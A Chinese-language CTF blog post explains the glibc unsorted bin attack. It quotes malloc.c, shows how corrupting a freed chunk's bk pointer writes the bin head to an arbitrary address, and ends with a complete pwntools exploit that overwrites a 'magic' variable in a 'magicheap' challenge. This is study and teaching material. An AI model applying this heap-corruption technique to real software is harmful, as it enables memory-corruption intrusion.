Unsorted Bin Attack

Unsorted Bin

  • FIFO双链表结构:fd指针指向后一个堆块,bk指向前一个。 插入的时候插入到 unsorted bin 的头部,取出的时候从链表尾获取

  • chunk size>=0x80

  • 可以leak main arena ==> leak libc base

    chunk 通过以下三种途径进入UB

  1. 当一个较大的 chunk 被分割成两半后,如果剩下的部分大于 MINSIZE,就会被放到 unsorted bin 中。
  2. 释放一个不属于 fast bin 的 chunk,并且该 chunk 不和 top chunk 紧邻时,该 chunk 会被首先放到 unsorted bin 中。关于 top chunk 的解释,请参考下面的介绍。
  3. 当进行 malloc_consolidate 时,可能会把合并后的 chunk 放到 unsorted bin 中,如果不是和 top chunk 近邻的话。

UB Attack principle

glibc/malloc/malloc.c 中的 _int_malloc 有这么一段代码,当将一个 unsorted bin 取出的时候,会将 bck->fd 的位置写入本 Unsorted Bin 的位置。

1
2
3
4
5
/* remove from unsorted list */
if (__glibc_unlikely (bck->fd != victim))
  malloc_printerr ("malloc(): corrupted unsorted chunks 3");
unsorted_chunks (av)->bk = bck;
bck->fd = unsorted_chunks (av);

换而言之,如果我们控制了 bk 的值,我们就能将 unsorted_chunks (av) 写到任意地址。

Premise

能够控制free UBchunk的bk指针

Exploit

  • victim = unsorted_chunks(av)->bk=p

  • bck = victim->bk=p->bk = target addr-0x10

  • unsorted_chunks(av)->bk = bck=target addr-0x10

  • bck->fd = *(target addr -0x10+0x10) = unsorted_chunks(av);

简而言之,将UBchunk->bk改为target addr-0x10,再申请一个UBchunk,target addr的值就被修改为 UB 的链表头部 (一个不可控且很大的值)

Sample

只要choice==4869,magic>=4869就可以cat flag。

create和delete都没问题。edit中对于输入的idx未加校验导致堆溢出。

因此我们通过UB Attack将magic覆盖就能得到flag。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
#! /usr/bin/python
# coding=utf-8
from pwn import *

context.log_level = 'debug'

elf_path = "./magicheap"

elf = ELF(elf_path)
libc = ELF('/lib/x86_64-linux-gnu/libc-2.23.so')
p = process(elf_path)

sda = lambda x,y:p.sendlineafter(x,y)
sdl = lambda x:p.sendline(x)
rct = lambda x:p.recvuntil(x)
prt = lambda x:log.info('\x1b[01;38;5;214m' + x + '==>' + hex(eval(x)) + '\x1b[0m')

def ADD(size,ctx):
	sda(':','1')
	sda(':',str(size))
	sda(':',ctx)

def EDIT(idx,size,ctx):
	sda(':','2')
	sda(':',str(idx))
	sda(':',str(size))
	sda(':',ctx)

def DELE(idx):
	sda(':','3')
	sda(':',str(idx))

#init
ADD(0x20,"aaaa") #0 fix the io stream problem
ADD(0x80,"aaaa") #1 UB chunk
ADD(0x20,"aaaa") #2 split from top chunk

#attack
magic = 0x6020c0
fd = 0
bk = magic - 0x10

DELE(1) 
#step1 free UB chunk
EDIT(0,0x20 + 0x20, "a" * 0x20 + p64(0) + p64(0x91) + p64(fd) + p64(bk))
#step2 chunk overflow to overwrite chunk1's header
ADD(0x80,"getflag")

sda(':','4869')
p.interactive()

扫一扫,分享到微信

微信分享二维码

tag:

    缺失模块。
    1、请确保node版本大于6.2
    2、在博客根目录(注意不是yilia根目录)执行以下命令:
    npm i hexo-generator-json-content --save

    3、在根目录_config.yml里添加配置: 

      jsonContent:
    meta: false
    pages: false
    posts:
      title: true
      date: true
      path: true
      text: false
      raw: false
      content: false
      slug: false
      updated: false
      comments: false
      link: false
      permalink: false
      excerpt: false
      categories: false
      tags: true

江南大学通信工程在读本科生;江南大学信息安全俱乐部19级成员、现任俱乐部负责人;SU现役成员